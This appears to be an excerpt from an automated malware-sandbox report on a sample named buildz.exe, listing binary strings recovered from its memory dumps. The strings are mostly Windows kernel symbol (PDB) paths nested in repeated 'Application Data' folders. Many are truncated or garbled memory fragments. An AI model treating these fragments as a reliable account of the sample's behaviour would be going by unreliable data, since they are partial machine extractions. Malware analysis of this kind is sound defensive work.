          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: buildz.exe, 00000006.00000003.2864608950.0000000003918000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2830683737.00000000038F1000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2831125784.0000000003909000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2869267366.0000000003921000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\\0T source: buildz.exe, 00000006.00000003.2902921961.0000000003796000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2911345558.00000000037A6000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2909511400.000000000379F000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: buildz.exe, 00000006.00000003.2927908987.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2935552901.0000000003A2A000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2928758672.0000000003A0B000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2935479787.0000000003A23000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\bbwe\ SeFRL source: buildz.exe, 00000006.00000003.2940073344.0000000003122000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\2 source: buildz.exe, 00000006.00000003.2927908987.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2918151256.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2917779893.0000000003949000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2917318091.0000000003940000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\} source: buildz.exe, 00000006.00000003.2908778230.0000000003A5A000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2918151256.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2917779893.0000000003949000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2917318091.0000000003940000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2920284157.0000000003A5B000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\*e\AR source: buildz.exe, 00000006.00000003.2902921961.0000000003796000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2909511400.000000000379F000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\s\alf< source: buildz.exe, 00000006.00000003.2941175800.0000000003862000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb.qual\ source: buildz.exe, 00000006.00000003.2725802650.0000000003747000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\e\ta\ source: buildz.exe, 00000006.00000003.2935890932.00000000038AC000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\gMR source: buildz.exe, 00000006.00000003.2829983704.000000000312A000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\+ source: buildz.exe, 00000006.00000003.2911050462.0000000003701000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2921149380.0000000003702000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\ source: buildz.exe, 00000006.00000003.2439164862.0000000003146000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2929777175.00000000006EC000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2490478427.00000000006EB000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2866758779.00000000006EE000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2904037838.00000000006EC000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2505810794.000000000315E000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2504691310.0000000003147000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2790715990.00000000006EE000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: buildz.exe, 00000006.00000003.2865110592.00000000039BC000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2902251241.0000000003989000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2904082392.0000000003990000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2901206490.0000000003940000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\G source: buildz.exe, 00000006.00000003.2927908987.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2917779893.0000000003A65000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2920284157.0000000003A65000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2929916256.0000000003A6B000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2928147752.0000000003A3B000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\y\\ source: buildz.exe, 00000006.00000003.2818268336.00000000030FC000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2831789553.0000000003105000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: buildz.exe, 00000006.00000003.2934199949.0000000003A8F000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2927908987.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2929916256.0000000003A6B000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2928147752.0000000003A3B000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\gs\0 source: buildz.exe, 00000006.00000003.2829769340.0000000003863000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2863908883.00000000038BD000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2865764068.00000000038C0000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: buildz.exe, 00000006.00000003.2865110592.00000000039BC000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2902251241.0000000003989000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2904082392.0000000003990000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2901206490.0000000003940000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: buildz.exe, 00000006.00000003.2725563548.0000000003146000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2726652522.0000000003177000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2725802650.0000000003747000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2726101777.0000000003175000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2789829817.000000000315E000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2790348604.0000000003191000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\ source: buildz.exe, 00000006.00000003.2863127221.0000000003175000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2902662689.000000000385F000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2866705786.000000000385D000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2862740588.0000000003156000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\d source: buildz.exe, 00000006.00000003.2829091548.0000000003163000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2830232221.000000000316F000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2830146833.0000000003169000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\e\ source: buildz.exe, 00000006.00000003.2726243486.000000000313B000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2725563548.000000000311A000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2725945284.000000000312E000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: buildz.exe, 00000006.00000003.2726779941.000000000310A000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2726199726.00000000030FC000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\I source: buildz.exe, 00000006.00000003.2725802650.0000000003747000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\40\ source: buildz.exe, 00000006.00000003.2504748326.0000000003105000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2434628314.00000000030FC000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error.qual= source: buildz.exe, 00000006.00000003.2725802650.0000000003747000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: ^ottings\Application Data\Temp\Symbols\winload_prod.pdb\ source: buildz.exe, 00000006.00000003.2935157500.00000000006EC000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2940580661.00000000006EE000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: buildz.exe, 00000006.00000003.2830683737.00000000038F1000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2831125784.0000000003909000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2819742747.0000000003125000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2817731295.0000000003125000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: buildz.exe, 00000006.00000003.2913018293.0000000003151000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2912099510.000000000314F000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2903790233.0000000003130000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2911709152.0000000003127000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\c source: buildz.exe, 00000006.00000003.2865554104.0000000003127000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2829983704.000000000312A000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2872932828.0000000003133000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2866166474.000000000312C000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: buildz.exe, 00000006.00000003.2725802650.0000000003747000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2790917732.00000000037CB000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2790773651.00000000037A7000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2789619660.000000000373E000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2790278127.000000000378D000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\P source: buildz.exe, 00000006.00000003.2725802650.0000000003747000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\40\3 source: buildz.exe, 00000006.00000003.2439164862.0000000003146000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2505810794.000000000315E000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2504691310.0000000003147000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\94\bwe\ source: buildz.exe, 00000006.00000003.2941175800.0000000003862000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\*st\ source: buildz.exe, 00000006.00000003.2818268336.00000000030FC000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\\N source: buildz.exe, 00000006.00000003.2789619660.0000000003701000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2816935337.000000000370C000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2819426188.000000000370C000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: sers\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb.qualj source: buildz.exe, 00000006.00000003.2726199726.00000000030FC000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\e\@ source: buildz.exe, 00000006.00000003.2908778230.0000000003940000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2910039214.00000000039B9000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\1 source: buildz.exe, 00000006.00000003.2725802650.0000000003747000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\ source: buildz.exe, 00000006.00000003.2504748326.0000000003105000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2434628314.00000000030FC000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: buildz.exe, 00000006.00000003.2725802650.0000000003747000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\ion source: buildz.exe, 00000006.00000003.2789619660.0000000003701000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Microsoft\input\it-IT\od.pdb source: buildz.exe, 00000006.00000003.2790773651.00000000037A7000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2789619660.000000000373E000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2790278127.000000000378D000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\+~\0* source: buildz.exe, 00000006.00000003.2725802650.0000000003747000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2790773651.00000000037A7000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2789619660.000000000373E000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2790278127.000000000378D000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\871\ source: buildz.exe, 00000006.00000003.2942712973.0000000003948000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2934520323.0000000003940000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2938642063.0000000003948000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2935260210.0000000003940000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\40\\ source: buildz.exe, 00000006.00000003.2940468429.000000000371C000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2939266286.0000000003716000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb023__16_5_0.txt5 source: buildz.exe, 00000006.00000003.2725802650.0000000003747000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: on Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\tion x% source: buildz.exe, 00000006.00000003.2943472927.000000000319D000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\Cef\ source: buildz.exe, 00000006.00000003.2918151256.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2917779893.0000000003949000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2917318091.0000000003940000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\tion x% source: buildz.exe, 00000006.00000003.2939681411.0000000003183000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2941052556.000000000318D000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2940550146.000000000318A000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\wy\licat source: buildz.exe, 00000006.00000003.2939681411.0000000003183000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2941052556.000000000318D000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2940550146.000000000318A000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error.qual0 source: buildz.exe, 00000006.00000003.2725802650.0000000003747000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\\bdl source: buildz.exe, 00000006.00000003.2940073344.0000000003122000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\6 source: buildz.exe, 00000006.00000003.2934199949.0000000003A8F000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2929916256.0000000003ACE000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\e\h]b source: buildz.exe, 00000006.00000003.2923364119.0000000003894000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2921747747.0000000003894000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\bat\/s source: buildz.exe, 00000006.00000003.2789952289.000000000312C000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2725563548.000000000311A000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2725945284.000000000312E000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2726806827.0000000003133000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\\\ source: buildz.exe, 00000006.00000003.2862884763.0000000003788000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2872802635.0000000003794000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\ogs\ source: buildz.exe, 00000006.00000003.2902251241.0000000003989000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2904082392.0000000003990000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2901206490.0000000003940000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\\ source: buildz.exe, 00000006.00000003.2789829817.000000000315E000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\8Y source: buildz.exe, 00000006.00000003.2923364119.0000000003894000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2921747747.0000000003894000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\INetCache\IE\53IVYM2Y\d.pdb\ source: buildz.exe, 00000006.00000003.2935552901.0000000003A2A000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2943688731.0000000003A2A000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2935479787.0000000003A23000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\AC\6q source: buildz.exe, 00000006.00000003.2927908987.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2928758672.0000000003A0B000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\a\1d source: buildz.exe, 00000006.00000003.2935890932.00000000038AC000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\tate\.9 source: buildz.exe, 00000006.00000003.2911050462.0000000003701000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2921149380.0000000003702000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\\:Rq source: buildz.exe, 00000006.00000003.2830036710.000000000310F000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2865554104.000000000311E000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2831965794.0000000003114000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\tate\ source: buildz.exe, 00000006.00000003.2818836526.0000000003747000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2789619660.000000000373E000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2818383250.0000000003746000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2790551029.000000000374A000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\H source: buildz.exe, 00000006.00000003.2927908987.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2917779893.0000000003A65000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2920284157.0000000003A65000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2929916256.0000000003A6B000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2928147752.0000000003A3B000.00000004.00000020.00020000.00000000.sdmp
